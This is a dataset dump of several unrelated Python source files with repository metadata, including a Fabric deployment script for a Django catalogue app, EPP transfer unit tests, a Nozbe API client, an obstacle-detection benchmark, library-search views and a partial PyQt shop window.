de4b2a6933b3aa5e5ae0ced88de5b8ddb6b75250 | 4,802 | py | Python | data/train/python/d83dbb1902b79a51c8b572a88e9c7888c362d43c__init__.py | harshp8l/deep-learning-lang-detection | 2a54293181c1c2b1a2b840ddee4d4d80177efb33 | [
"MIT"
] | 84 | 2017-10-25T15:49:21.000Z | 2021-11-28T21:25:54.000Z | data/train/python/d83dbb1902b79a51c8b572a88e9c7888c362d43c__init__.py | vassalos/deep-learning-lang-detection | cbb00b3e81bed3a64553f9c6aa6138b2511e544e | [
"MIT"
] | 5 | 2018-03-29T11:50:46.000Z | 2021-04-26T13:33:18.000Z | data/train/python/d83dbb1902b79a51c8b572a88e9c7888c362d43c__init__.py | vassalos/deep-learning-lang-detection | cbb00b3e81bed3a64553f9c6aa6138b2511e544e | [
"MIT"
] | 24 | 2017-11-22T08:31:00.000Z | 2022-03-27T01:22:31.000Z | from fabric.api import *
from fabric.contrib.files import *
from path import path as ppath
app = env.app = {
'live_catalogue-repo': 'https://svn.eionet.europa.eu/repositories/Python/flis.live_catalogue',
'localrepo': ppath(__file__).abspath().parent.parent,
}
try: from localcfg import *
except: pass
app.update({
'instance_var': app['repo']/'instance',
'manage_var': app['repo']/'live_catalogue',
'live_catalogue_var': app['repo']/'live_catalogue'/'live_catalogue',
'sandbox': app['repo']/'sandbox',
'user': 'edw',
})
@task
@task
@task
@task
@task
@task
| 36.105263 | 104 | 0.636818 | from fabric.api import *
from fabric.contrib.files import *
from path import path as ppath
app = env.app = {
'live_catalogue-repo': 'https://svn.eionet.europa.eu/repositories/Python/flis.live_catalogue',
'localrepo': ppath(__file__).abspath().parent.parent,
}
try: from localcfg import *
except: pass
app.update({
'instance_var': app['repo']/'instance',
'manage_var': app['repo']/'live_catalogue',
'live_catalogue_var': app['repo']/'live_catalogue'/'live_catalogue',
'sandbox': app['repo']/'sandbox',
'user': 'edw',
})
@task
def ssh():
    """Open an interactive remote shell positioned inside the checkout.

    NOTE(review): ``app['repo']`` is not defined by this file's literal
    config dict; it is presumably supplied by the ``localcfg`` star-import
    above -- confirm before running without a localcfg.
    """
    open_shell("cd '%(repo)s'" % app)
def _install_random_key(remote_path, key_length=20, mode=0600):
    """Generate a random alphanumeric secret and upload it to *remote_path*.

    The secret is *key_length* random characters; the remote file is
    created with the given octal *mode* (default 0600, owner read/write).

    NOTE(review): Python 2 only (``0600`` octal literal, ``xrange``,
    ``StringIO``). ``random.choice`` is not cryptographically strong --
    acceptable for a Django SECRET_KEY bootstrap, not for credentials.
    """
    import random
    import string
    from StringIO import StringIO
    vocabulary = string.ascii_letters + string.digits
    key = ''.join(random.choice(vocabulary) for c in xrange(key_length))
    put(StringIO(key), remote_path, mode=mode)
def _svn_repo(repo_path, origin_url, update=True):
    """Ensure an SVN working copy of *origin_url* exists at *repo_path*.

    Performs an initial checkout when no ``.svn`` directory is present;
    otherwise runs ``svn up``, unless *update* is false.
    """
    if not exists(repo_path/'.svn'):
        run("mkdir -p '%s'" % repo_path)
        with cd(repo_path):
            run("svn co '%s' ." % origin_url)
    elif update:
        with cd(repo_path):
            run("svn up")
@task
def install_live_catalogue():
    """First-time deployment of the live_catalogue Django app.

    Checks out/updates the code, builds the virtualenv, creates instance
    directories and the SECRET_KEY file, uploads the supervisord config
    and runs the syncdb/migrate/loaddata/collectstatic steps.

    NOTE(review): almost entirely duplicated by update_live_catalogue()
    below (which adds a service restart but skips the secret key); the two
    should probably share a helper.
    """
    _svn_repo(app['repo'], app['live_catalogue-repo'], update=True)
    # Build the virtualenv on first run, then (re)install requirements.
    if not exists(app['sandbox']):
        run("virtualenv --distribute '%(sandbox)s'" % app)
    run("%(sandbox)s/bin/pip install -r %(repo)s/requirements.txt" % app)
    # Create media/instance directories if missing.
    if not exists(app['manage_var']/'media'):
        run("mkdir -p '%(manage_var)s/media'" % app)
    if not exists(app['instance_var']):
        run("mkdir -p '%(instance_var)s'" % app)
    if not exists(app['instance_var']/'files'):
        run("mkdir -p '%(instance_var)s/files'" % app)
    # Generate the secret key only once; never overwrite an existing one.
    secret_key_path = app['instance_var']/'secret_key.txt'
    if not exists(secret_key_path):
        _install_random_key(str(secret_key_path))
    #put(app['localrepo']/'fabfile'/'production-settings.py',
    # str(app['live_catalogue_var']/'local_settings.py'))
    upload_template(app['localrepo']/'fabfile'/'supervisord.conf',
                    str(app['sandbox']/'supervisord.conf'),
                    context=app, backup=False)
    # Database schema, migrations, initial fixtures, then static files.
    run("%s/bin/python %s/manage.py syncdb" % (app['sandbox'], app['manage_var']))
    run("%s/bin/python %s/manage.py migrate" % (app['sandbox'], app['manage_var']))
    run("%s/bin/python %s/manage.py loaddata initial_categories" % (app['sandbox'], app['manage_var']))
    run("%s/bin/python %s/manage.py loaddata initial_flis_topics" % (app['sandbox'], app['manage_var']))
    run("%s/bin/python %s/manage.py loaddata initial_themes" % (app['sandbox'], app['manage_var']))
    run("%s/bin/python %s/manage.py collectstatic --noinput" % (app['sandbox'], app['manage_var']))
@task
def live_catalogue_supervisor():
    """Start the supervisord daemon from the sandbox virtualenv."""
    run("'%(sandbox)s/bin/supervisord'" % {
        'sandbox': app['sandbox'],
    })
@task
def update_live_catalogue():
    """Redeploy the live_catalogue app and restart the running service.

    Same steps as install_live_catalogue() except that it does not touch
    ``secret_key.txt`` and finishes with a supervisorctl restart.
    """
    _svn_repo(app['repo'], app['live_catalogue-repo'], update=True)
    if not exists(app['sandbox']):
        run("virtualenv --distribute '%(sandbox)s'" % app)
    run("%(sandbox)s/bin/pip install -r %(repo)s/requirements.txt" % app)
    if not exists(app['manage_var']/'media'):
        run("mkdir -p '%(manage_var)s/media'" % app)
    if not exists(app['instance_var']):
        run("mkdir -p '%(instance_var)s'" % app)
    if not exists(app['instance_var']/'files'):
        run("mkdir -p '%(instance_var)s/files'" % app)
    #put(app['localrepo']/'fabfile'/'production-settings.py',
    # str(app['live_catalogue_var']/'local_settings.py'))
    upload_template(app['localrepo']/'fabfile'/'supervisord.conf',
                    str(app['sandbox']/'supervisord.conf'),
                    context=app, backup=False)
    # Schema/migrations/fixtures/static, then bounce the service.
    run("%s/bin/python %s/manage.py syncdb" % (app['sandbox'], app['manage_var']))
    run("%s/bin/python %s/manage.py migrate" % (app['sandbox'], app['manage_var']))
    run("%s/bin/python %s/manage.py loaddata initial_categories" % (app['sandbox'], app['manage_var']))
    run("%s/bin/python %s/manage.py loaddata initial_flis_topics" % (app['sandbox'], app['manage_var']))
    run("%s/bin/python %s/manage.py loaddata initial_themes" % (app['sandbox'], app['manage_var']))
    run("%s/bin/python %s/manage.py collectstatic --noinput" % (app['sandbox'], app['manage_var']))
    execute('service_live_catalogue', 'restart')
@task
def service_live_catalogue(action):
    """Run a supervisorctl *action* (start/stop/restart/...) against the
    ``live_catalogue`` program."""
    run("'%(sandbox)s/bin/supervisorctl' %(action)s %(name)s" % {
        'sandbox': app['sandbox'],
        'action': action,
        'name': 'live_catalogue',
    })
@task
def deploy_live_catalogue():
    """Full deployment: install the app, start supervisord, then
    (re)start the managed service."""
    for task_name in ('install_live_catalogue', 'live_catalogue_supervisor'):
        execute(task_name)
    execute('service_live_catalogue', 'restart')
| 4,027 | 0 | 178 |
33f3d29ca81d488b9b1fa12a199928dd2f994a1a | 1,643 | py | Python | tests/unit/ipnetwork/test_brtransferipnetworkcommand.py | ivcmartello/registrobrepp | dece39a451bcdb964d337df6aa7bd418a60c1a85 | [
"MIT"
] | null | null | null | tests/unit/ipnetwork/test_brtransferipnetworkcommand.py | ivcmartello/registrobrepp | dece39a451bcdb964d337df6aa7bd418a60c1a85 | [
"MIT"
] | null | null | null | tests/unit/ipnetwork/test_brtransferipnetworkcommand.py | ivcmartello/registrobrepp | dece39a451bcdb964d337df6aa7bd418a60c1a85 | [
"MIT"
] | null | null | null | import pytest
from eppy.doc import EppResponse
from lxml import etree
from registrobrepp.ipnetwork.brtransferipnetworkcommand import BrEppTransferIpNetworkCommand
| 42.128205 | 136 | 0.712112 | import pytest
from eppy.doc import EppResponse
from lxml import etree
from registrobrepp.ipnetwork.brtransferipnetworkcommand import BrEppTransferIpNetworkCommand
class TestBrTransferIpNetworkCommand:
    """EPP <transfer> tests for IP network objects.

    The ``ipnetworkxmlschema`` and ``...xmlexpected`` fixtures are not
    defined here; presumably they come from the suite's conftest -- confirm.
    """
    @pytest.fixture
    def ipnetworkcommand(self):
        # A "transfer request" command for a fixed repository object id.
        roid = 'b_12345-LACNIC'
        command = BrEppTransferIpNetworkCommand('request', roid)
        command.add_clTRID('ABC-12345')
        return command
    def test_transfer_request_ipnetwork_command(self, ipnetworkcommand, ipnetworkxmlschema, transferrequestipnetworkcommandxmlexpected):
        # Serialized command must validate against the XSD and match the
        # golden XML byte for byte.
        xml = ipnetworkcommand.to_xml(force_prefix=True).decode()
        assert ipnetworkxmlschema.validate(etree.fromstring(xml))
        assert xml == transferrequestipnetworkcommandxmlexpected
    def test_check_ipnetwork_response(self, responsetransferipnetworkcommandxmlexpected):
        # Parse the golden response, check the trnData fields, and check
        # that re-serialization round-trips exactly.
        response = EppResponse.from_xml(responsetransferipnetworkcommandxmlexpected, extra_nsmap={
            'ipnetwork': 'urn:ietf:params:xml:ns:ipnetwork-1.0'
        })
        xml = response.to_xml(force_prefix=True).decode()
        data = response['epp']['response']['resData']['ipnetwork:trnData']
        assert data.roid == 'b_12345-LACNIC'
        assert data.trStatus == 'pending'
        assert data.reID == 'ClientX'
        assert data.reDate == '2000-06-08T22:00:00.0Z'
        assert data.acID == 'ClientY'
        assert data.acDate == '2000-06-13T22:00:00.0Z'
        assert response['epp']['response']['trID']['clTRID'] == 'ABC-12345'
        assert response['epp']['response']['trID']['svTRID'] == '54322-XYZ'
        assert xml == responsetransferipnetworkcommandxmlexpected
d1b656c61ecb335fbfba74450b82a969d9671697 | 2,858 | py | Python | nozbe.py | msielicki/python-nozbe | 6cc9287e4db106c75e279ef428881bcbdcc16e83 | [
"MIT"
] | 2 | 2017-03-13T22:37:35.000Z | 2019-07-29T00:19:43.000Z | nozbe.py | msielicki/python-nozbe | 6cc9287e4db106c75e279ef428881bcbdcc16e83 | [
"MIT"
] | null | null | null | nozbe.py | msielicki/python-nozbe | 6cc9287e4db106c75e279ef428881bcbdcc16e83 | [
"MIT"
] | 2 | 2018-02-18T08:23:36.000Z | 2018-09-03T12:10:49.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Mariusz Sielicki <mariusz.sielicki@gmail.com>
import logging
import requests
log = logging.getLogger("nozbe")
| 30.731183 | 83 | 0.584325 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Mariusz Sielicki <mariusz.sielicki@gmail.com>
import logging
import requests
log = logging.getLogger("nozbe")
class Nozbe(object):
    """Thin client for the Nozbe web API.

    Request URLs take the form
    ``<API_URL>/<action>[/<arg>][/<key>-<value>...]/key-<API_KEY>``.
    """
    API_URL = 'https://webapp.nozbe.com/api'
    API_KEY = None
    SESSION = None
    ACTIONS = ('projects', 'contexts', 'newproject', 'actions', 'newaction')
    def __init__(self, api_key, username=None, password=None):
        # *username*/*password* are accepted for interface compatibility
        # but unused: authentication is API-key based.
        if api_key is not None:
            self.API_KEY = api_key
        if self.SESSION is None:
            self.SESSION = requests.Session()
    def _prepare_url(self, action, *args, **kwargs):
        """Build the request URL for *action*.

        Raises AttributeError when *action* is not one of ACTIONS.
        """
        if action not in self.ACTIONS:
            log.error('Unsupported action: %s', action)
            raise AttributeError
        parts = [self.API_URL, action]
        if args:
            # Historical quirk kept for compatibility: exactly one extra
            # positional path segment is supported.
            parts.append(*args)
        if kwargs:
            parts.append('/'.join('{}-{}'.format(key, value)
                                  for key, value in kwargs.items()))
        parts.append('key-{}'.format(self.API_KEY))
        return '/'.join(parts)
    def _fetch(self, url):
        """GET *url*; return the decoded JSON body, or [] when the
        response is not valid JSON."""
        log.info('Request for url: %s', url)
        response = self.SESSION.get(url)
        try:
            return response.json()
        except ValueError:
            log.debug('Request for url: %s', url)
            return []
    def get_projects(self):
        """Return the list of all projects."""
        return self._fetch(self._prepare_url('projects'))
    def get_project_by_name(self, name):
        """Return the first project called *name*, or None."""
        matches = (proj for proj in self.get_projects() if name == proj['name'])
        return next(matches, None)
    def get_project_by_id(self, project_id):
        """Return the project whose id is *project_id*, or None."""
        matches = (proj for proj in self.get_projects() if project_id == proj['id'])
        return next(matches, None)
    def get_project_tasks(self, id=None, name=None):
        """Return the actions of a project selected by *id* or *name*.

        Raises AttributeError when neither is given.  (The *id* parameter
        name shadows the builtin but is part of the public keyword
        interface, so it is kept.)
        """
        if id is not None:
            project_id = id
        elif name is not None:
            project_id = self.get_project_by_name(name)['id']
        else:
            log.error('Project id or name must be provided')
            raise AttributeError
        return self._fetch(self._prepare_url('actions', what='project', id=project_id))
    def get_contexts(self):
        """Return the list of all contexts."""
        return self._fetch(self._prepare_url('contexts'))
    def create_project(self, name, force=False):
        """Create a project called *name* and return the project list.

        Unless *force* is true, an existing project with the same name is
        left alone and the current project list is returned instead.
        """
        if not force:
            existing = self.get_projects()
            names = [proj['name'] for proj in existing]
            if name in names:
                log.warn('Project with name "%s" already exists.', name)
                return existing
        self._fetch(self._prepare_url('newproject', name=name))
        return self.get_projects()
    def create_project_task(self, name, project_id):
        """Add an action called *name* to *project_id*; return its tasks."""
        self._fetch(self._prepare_url('newaction', name=name, project_id=project_id))
        return self.get_project_tasks(project_id)
| 2,238 | 429 | 23 |
7b6ee7f219bb40fd9c0b27109e5cf02b92963deb | 2,866 | py | Python | vision/benchmarks/times/bench_obstacle.py | pieperm/IARC-2020 | a90bfe830ea2ceced59e8f2e7b54862dda42f5a3 | [
"MIT"
] | 12 | 2019-10-10T22:17:45.000Z | 2021-09-14T23:54:02.000Z | vision/benchmarks/times/bench_obstacle.py | pieperm/IARC-2020 | a90bfe830ea2ceced59e8f2e7b54862dda42f5a3 | [
"MIT"
] | 178 | 2019-10-29T16:28:02.000Z | 2021-07-26T17:15:31.000Z | vision/benchmarks/times/bench_obstacle.py | pieperm/IARC-2020 | a90bfe830ea2ceced59e8f2e7b54862dda42f5a3 | [
"MIT"
] | 6 | 2019-10-09T00:20:27.000Z | 2021-09-28T00:24:00.000Z | """
Utility to measure performance of obstacle detector.
Parameter Defaults
------------------
Resolution = (1280, 720)
Noise SD = 0
N Objects = 0
Type = circle
Radius = 100
"""
import os, sys
parent_dir = os.path.dirname(os.path.abspath(__file__))
gparent_dir = os.path.dirname(parent_dir)
ggparent_dir = os.path.dirname(gparent_dir)
gggparent_dir = os.path.dirname(ggparent_dir)
sys.path += [parent_dir, gparent_dir, ggparent_dir, gggparent_dir]
import json
import numpy as np
import cv2
import common
from vision.obstacle.obstacle_finder import ObstacleFinder
from vision.common.import_params import import_params
class TimeObstacle:
    """
    Timing ObstacleFinder methods.

    Benchmark-harness style class: setup() builds the image fixtures and
    detector, time_find() is the timed operation (asv-like ``time_*``
    naming -- presumably driven by an external runner; confirm).
    """
    DEFAULT_DIMS = (1280, 720)
    DEFAULT_RADIUS = 100
    def setup(self):
        """
        Configure blob detector and initialize images.
        """
        ## Generate images
        self.PARAMETERS = {}
        self.PARAMETERS.update(common.blank_dimensions())
        base_color, base_depth = common.blank_dimensions(self.DEFAULT_DIMS)
        # Single centered circle at several radii.
        for radius in [25, 50, 100, 250]:
            color_image, depth_image = np.copy(base_color), np.copy(base_depth)
            cv2.circle(color_image, (640, 360), radius, (255, 255, 255), thickness=-1)
            cv2.circle(depth_image, (640, 360), radius, (255), thickness=-1)
            self.PARAMETERS.update({f'radius={radius}': (color_image, depth_image)})
        # One to each corner
        for n_obj in range(4):
            color_image, depth_image = np.copy(base_color), np.copy(base_depth)
            for location in [(320, 180), (320, 540), (960, 180), (960, 540)][:n_obj]:
                cv2.circle(color_image, location, self.DEFAULT_RADIUS, (255, 255, 255), thickness=-1)
                cv2.circle(depth_image, location, self.DEFAULT_RADIUS, (255), thickness=-1)
            self.PARAMETERS.update({f'n_obj={n_obj}': (color_image, depth_image)})
        # On default noise spectrum
        for title, (color_image, depth_image) in common.noise().items():
            cv2.circle(color_image, (640, 360), self.DEFAULT_RADIUS, (255, 255, 255), thickness=-1)
            cv2.circle(depth_image, (640, 360), self.DEFAULT_RADIUS, (255), thickness=-1)
            self.PARAMETERS.update({f'{title} single': (color_image, depth_image)})
        ## Read current params & setup obstacle detector
        # Config path depends on whether we run from the benchmarks root or
        # from inside times/.
        prefix = '' if os.path.isdir("times") else '..'
        config_filename = os.path.join(prefix, '..', 'obstacle', 'config.json')
        with open(config_filename, 'r') as config_file:
            config = json.load(config_file)
        self.blob_finder = ObstacleFinder(params=import_params(config))
    def time_find(self, color_image, depth_image):
        """
        Time the ObstacleFinder.find function.
        """
        self.blob_finder.find(color_image, depth_image)
| 32.568182 | 101 | 0.647244 | """
Utility to measure performance of obstacle detector.
Parameter Defaults
------------------
Resolution = (1280, 720)
Noise SD = 0
N Objects = 0
Type = circle
Radius = 100
"""
import os, sys
parent_dir = os.path.dirname(os.path.abspath(__file__))
gparent_dir = os.path.dirname(parent_dir)
ggparent_dir = os.path.dirname(gparent_dir)
gggparent_dir = os.path.dirname(ggparent_dir)
sys.path += [parent_dir, gparent_dir, ggparent_dir, gggparent_dir]
import json
import numpy as np
import cv2
import common
from vision.obstacle.obstacle_finder import ObstacleFinder
from vision.common.import_params import import_params
class TimeObstacle:
"""
Timing ObstacleFinder methods.
"""
DEFAULT_DIMS = (1280, 720)
DEFAULT_RADIUS = 100
def setup(self):
"""
Configure blob detector and initialize images.
"""
## Generate images
self.PARAMETERS = {}
self.PARAMETERS.update(common.blank_dimensions())
base_color, base_depth = common.blank_dimensions(self.DEFAULT_DIMS)
#
for radius in [25, 50, 100, 250]:
color_image, depth_image = np.copy(base_color), np.copy(base_depth)
cv2.circle(color_image, (640, 360), radius, (255, 255, 255), thickness=-1)
cv2.circle(depth_image, (640, 360), radius, (255), thickness=-1)
self.PARAMETERS.update({f'radius={radius}': (color_image, depth_image)})
# One to each corner
for n_obj in range(4):
color_image, depth_image = np.copy(base_color), np.copy(base_depth)
for location in [(320, 180), (320, 540), (960, 180), (960, 540)][:n_obj]:
cv2.circle(color_image, location, self.DEFAULT_RADIUS, (255, 255, 255), thickness=-1)
cv2.circle(depth_image, location, self.DEFAULT_RADIUS, (255), thickness=-1)
self.PARAMETERS.update({f'n_obj={n_obj}': (color_image, depth_image)})
# On default noise specturm
for title, (color_image, depth_image) in common.noise().items():
cv2.circle(color_image, (640, 360), self.DEFAULT_RADIUS, (255, 255, 255), thickness=-1)
cv2.circle(depth_image, (640, 360), self.DEFAULT_RADIUS, (255), thickness=-1)
self.PARAMETERS.update({f'{title} single': (color_image, depth_image)})
## Read current params & setup obstacle detector
prefix = '' if os.path.isdir("times") else '..'
config_filename = os.path.join(prefix, '..', 'obstacle', 'config.json')
with open(config_filename, 'r') as config_file:
config = json.load(config_file)
self.blob_finder = ObstacleFinder(params=import_params(config))
def time_find(self, color_image, depth_image):
"""
Time the ObstacleFinder.find function.
"""
self.blob_finder.find(color_image, depth_image)
| 0 | 0 | 0 |
8f1e732615d84da880b410262631235f8839a656 | 8,469 | py | Python | molly/apps/library/views.py | mollyproject/mollyproject | 3247c6bac3f39ce8d275d19aa410b30c6284b8a7 | [
"Apache-2.0"
] | 7 | 2015-05-16T13:27:21.000Z | 2019-08-06T11:09:24.000Z | molly/apps/library/views.py | mollyproject/mollyproject | 3247c6bac3f39ce8d275d19aa410b30c6284b8a7 | [
"Apache-2.0"
] | null | null | null | molly/apps/library/views.py | mollyproject/mollyproject | 3247c6bac3f39ce8d275d19aa410b30c6284b8a7 | [
"Apache-2.0"
] | 4 | 2015-11-27T13:36:36.000Z | 2021-03-09T17:55:53.000Z | from datetime import timedelta
from django.core.paginator import Paginator
from django.http import Http404
from django.utils.translation import ugettext as _
from molly.utils import haversine
from molly.utils.views import BaseView, ZoomableView
from molly.utils.breadcrumbs import *
from molly.maps import Map
from molly.apps.library.forms import SearchForm
from molly.apps.library.models import LibrarySearchQuery, LibrarySearchError
class IndexView(BaseView):
"""
Index page of the library app
"""
@BreadcrumbFactory
class SearchDetailView(BaseView):
"""
Search results page
"""
@BreadcrumbFactory
AVAIL_COLORS = ['red', 'amber', 'purple', 'blue', 'green']
class ItemDetailView(ZoomableView):
"""
More detail about the item page
"""
@BreadcrumbFactory
class ItemHoldingsView(ZoomableView):
"""
Specific details of holdings of a particular item
"""
@BreadcrumbFactory
| 33.741036 | 97 | 0.58106 | from datetime import timedelta
from django.core.paginator import Paginator
from django.http import Http404
from django.utils.translation import ugettext as _
from molly.utils import haversine
from molly.utils.views import BaseView, ZoomableView
from molly.utils.breadcrumbs import *
from molly.maps import Map
from molly.apps.library.forms import SearchForm
from molly.apps.library.models import LibrarySearchQuery, LibrarySearchError
class IndexView(BaseView):
    """
    Index page of the library app
    """
    def get_metadata(self, request):
        # Metadata used by the site-wide search/index machinery.
        return {
            'title': _('Library search'),
            'additional': _("View libraries' contact information and find library items."),
        }
    def initial_context(self, request):
        # Provide an empty (unbound) search form to the template.
        return {
            'search_form': SearchForm()
        }
    @BreadcrumbFactory
    def breadcrumb(self, request, context):
        # Top-level breadcrumb: no parent, links to the app index.
        return Breadcrumb(self.conf.local_name, None, _('Library search'), lazy_reverse('index'))
    def handle_GET(self, request, context):
        # Static content: allow aggressive caching (28 days).
        return self.render(request, context, 'library/index',
                           expires=timedelta(days=28))
class SearchDetailView(BaseView):
    """
    Search results page
    """
    def get_metadata(self, request):
        # Result pages should not themselves appear in site search results.
        return {
            'show_in_results': False,
        }
    def initial_context(self, request):
        # Bind the search form to the GET parameters (may be empty).
        return {
            'search_form': SearchForm(request.GET),
        }
    @BreadcrumbFactory
    def breadcrumb(self, request, context):
        # Title says "Search Results" once a query was made, otherwise the
        # generic app title.
        if 'item' in context or context['search_form'].is_valid():
            title = _('Search Results')
        else:
            title = _('Library search')
        return Breadcrumb(
            self.conf.local_name,
            lazy_parent('index'),
            title,
            lazy_reverse('search'),
        )
    def handle_GET(self, request, context):
        """Validate the query, ask the configured provider for matches and
        render a paginated result list (10 items per page)."""
        search_form = context['search_form']
        if not (request.GET and search_form.is_valid()):
            # No form data received
            return self.render(request, context, 'library/item_list')
        # Build a query object to pass to providers here
        try:
            query = LibrarySearchQuery(
                search_form.cleaned_data['title'],
                search_form.cleaned_data['author'],
                search_form.cleaned_data['isbn']
            )
        # Fixed: use the "except ... as e" form (valid since Python 2.6)
        # for consistency with the LibrarySearchError handler below; the
        # old comma form is Python-2-only syntax.
        except LibrarySearchQuery.InconsistentQuery as e:
            return self.handle_error(request, context, e.msg)
        # Call provider
        try:
            results = self.conf.provider.library_search(query)
        except LibrarySearchError as e:
            return self.handle_error(request, context, e.message)
        # Paginate results, clamping the requested page into a valid range.
        paginator = Paginator(results, 10)
        try:
            page_index = int(request.GET['page'])
        except (ValueError, KeyError):
            page_index = 1
        else:
            page_index = min(max(1, page_index), paginator.num_pages)
        page = paginator.page(page_index)
        # Add cover image
        if hasattr(self.conf, 'additional_metadata_provider'):
            self.conf.additional_metadata_provider.annotate(page.object_list)
        # Without this, the object_list doesn't render when using fragment
        # rendering...
        page.object_list = list(page.object_list)
        # Render results page
        context.update({
            'removed': query.removed,
            'results': paginator,
            'page': page,
        })
        return self.render(request, context, 'library/item_list',
                           expires=timedelta(hours=1))
    def handle_error(self, request, context, message):
        """Render the result list with *message* shown as an error banner."""
        context['error_message'] = message
        return self.render(request, context, 'library/item_list')
AVAIL_COLORS = ['red', 'amber', 'purple', 'blue', 'green']
class ItemDetailView(ZoomableView):
    """
    More detail about the item page
    """
    def initial_context(self, request, control_number):
        """Look the item up by control number; 404 when unknown."""
        context = super(ItemDetailView, self).initial_context(request)
        item = self.conf.provider.control_number_search(control_number)
        if item is None:
            raise Http404()
        context.update({
            'item': item,
            'control_number': control_number,
        })
        return context
    @BreadcrumbFactory
    def breadcrumb(self, request, context, control_number):
        return Breadcrumb(
            self.conf.local_name,
            lazy_parent('search'),
            _('Search result'),
            lazy_reverse('item-detail', args=[control_number]),
        )
    def handle_GET(self, request, context, control_number):
        # Build a map of all the libraries that have this book, with markers
        # corresponding to colours
        # NOTE(review): Python 2 only (tuple-unpacking lambda below and
        # iterator .next()).
        user_location = request.session.get('geolocation:location')
        points = []
        point_libraries = []
        lbs = context['item'].libraries.items()
        # Resolve each holding library to its entity (location/title).
        for library, books in lbs:
            library.entity = library.get_entity()
        # Nearest library first when the user's location is known;
        # libraries without a located entity sort last (inf key).
        if user_location:
            lbs = sorted(lbs, key=lambda (l,b): (haversine(user_location, l.entity.location)
                if l.entity and l.entity.location else float('inf')))
        for library, books in lbs:
            if library.entity != None and library.entity.location != None:
                # Marker colour reflects the best availability among copies.
                colour = AVAIL_COLORS[max(b['availability'] for b in books)]
                points.append((library.entity.location[0],
                               library.entity.location[1],
                               colour,
                               library.entity.title))
                point_libraries.append(library)
        if len(points) > 0:
            context['map'] = Map(
                centre_point = (user_location[0], user_location[1], 'green', '')
                if user_location != None else None,
                points = points,
                min_points = 0 if context['zoom'] else len(points),
                zoom = context['zoom'],
                width = request.map_width,
                height = request.map_height,
            )
            # Yes, this is weird. fit_to_map() groups libraries with the same
            # location so here we add a marker_number to each library to display
            # in the template.
            lib_iter = iter(point_libraries)
            for i, (a,b) in enumerate(context['map'].points):
                for j in range(len(b)):
                    lib_iter.next().marker_number = i + 1
        context.update({
            'sorted_libraries': lbs,
        })
        return self.render(request, context, 'library/item_detail')
class ItemHoldingsView(ZoomableView):
    """
    Specific details of holdings of a particular item
    """
    def initial_context(self, request, control_number, sublocation):
        """Resolve the item and the specific holding library; 404 when
        either is unknown."""
        context = super(ItemHoldingsView, self).initial_context(request)
        # Get item from database
        item = self.conf.provider.control_number_search(control_number)
        if item is None:
            raise Http404
        # Find which particular library we're interested in
        # (*sublocation* encodes the library location as slash-separated
        # parts; note the loop keeps the LAST matching library).
        library = None
        for item_library in item.libraries:
            if item_library.location == tuple(sublocation.split('/')):
                library = item_library
        if library is None:
            raise Http404
        context.update({
            'item': item,
            'library': library,
            'control_number': control_number,
            'books': item.libraries[library],
        })
        return context
    def get_metadata(self, request, control_number, sublocation):
        # Holdings pages should not appear in site search results.
        return {
            'show_in_results': False,
        }
    @BreadcrumbFactory
    def breadcrumb(self, request, context, control_number, sublocation):
        return Breadcrumb(
            self.conf.local_name,
            lazy_parent('item-detail', control_number=control_number),
            _('Item holdings information'),
            lazy_reverse('item-holdings-detail', args=[control_number,sublocation]),
        )
    def handle_GET(self, request, context, control_number, sublocation):
        return self.render(request, context, 'library/item_holdings_detail')
7c4ea99478a8b815bbc72c96a682399b86c5de9d | 3,902 | py | Python | unit_08/main7.py | janusnic/21v-pyqt | 8ee3828e1c6e6259367d6cedbd63b9057cf52c24 | [
"MIT"
] | null | null | null | unit_08/main7.py | janusnic/21v-pyqt | 8ee3828e1c6e6259367d6cedbd63b9057cf52c24 | [
"MIT"
] | null | null | null | unit_08/main7.py | janusnic/21v-pyqt | 8ee3828e1c6e6259367d6cedbd63b9057cf52c24 | [
"MIT"
] | 2 | 2019-11-14T15:04:22.000Z | 2021-10-31T07:34:46.000Z | # -*- coding:utf-8 -*-
import os
import sys
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from sqldb import *
from add_customer import *
from customer_order import *
main()
| 38.254902 | 103 | 0.705279 | # -*- coding:utf-8 -*-
import os
import sys
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from sqldb import *
from add_customer import *
from customer_order import *
class ShopWindow(QMainWindow):
    """Main window of the shop application.

    Builds the menu bar, toolbars and actions for database, customer,
    order and product management; only the database/customer/order
    actions are wired to handlers (the browse/product actions are
    created but not connected).
    """
    def __init__(self, parent=None):
        super(ShopWindow, self).__init__(parent)
        self.setMinimumWidth(850)
        self.setWindowTitle(u'Магазин Все Продается')
        #create actions - these can be used in menus/toolbars etc.
        self.open_database = QAction("Open Database",self)
        self.close_database = QAction("Close Database",self)
        self.add_customer = QAction("Add Customer",self)
        self.browse_customers = QAction("Browse Customers",self)
        self.add_order = QAction("Add Order",self)
        self.browse_orders = QAction("Browse Orders",self)
        self.add_product = QAction("Add Product",self)
        self.browse_products = QAction("Browse Products",self)
        # create the menu bar
        self.menu_bar = self.menuBar()
        self.database_menu = self.menu_bar.addMenu("Database")
        self.customer_menu = self.menu_bar.addMenu("Customer")
        self.order_menu = self.menu_bar.addMenu("Order")
        self.product_menu = self.menu_bar.addMenu("Product")
        #add the actions to the menubar
        self.database_menu.addAction(self.open_database)
        self.database_menu.addAction(self.close_database)
        self.customer_menu.addAction(self.add_customer)
        self.customer_menu.addAction(self.browse_customers)
        self.order_menu.addAction(self.add_order)
        self.order_menu.addAction(self.browse_orders)
        self.product_menu.addAction(self.add_product)
        self.product_menu.addAction(self.browse_products)
        # create the toolbars
        self.database_toolbar = QToolBar("Manage Databases")
        self.customer_toolbar = QToolBar("Manage Customers")
        self.order_toolbar = QToolBar("Manage Orders")
        self.product_toolbar = QToolBar("Manage Products")
        # add the toolbars to the window
        self.addToolBar(self.database_toolbar)
        self.addToolBar(self.customer_toolbar)
        self.addToolBar(self.order_toolbar)
        self.addToolBar(self.product_toolbar)
        #add actions to toolbars
        self.database_toolbar.addAction(self.open_database)
        self.database_toolbar.addAction(self.close_database)
        self.customer_toolbar.addAction(self.add_customer)
        self.customer_toolbar.addAction(self.browse_customers)
        self.order_toolbar.addAction(self.add_order)
        self.order_toolbar.addAction(self.browse_orders)
        self.product_toolbar.addAction(self.add_product)
        self.product_toolbar.addAction(self.browse_products)
        #connections
        self.open_database.triggered.connect(self.openDatabase)
        self.add_customer.triggered.connect(self.addCustomer)
        self.add_order.triggered.connect(self.addOrder)
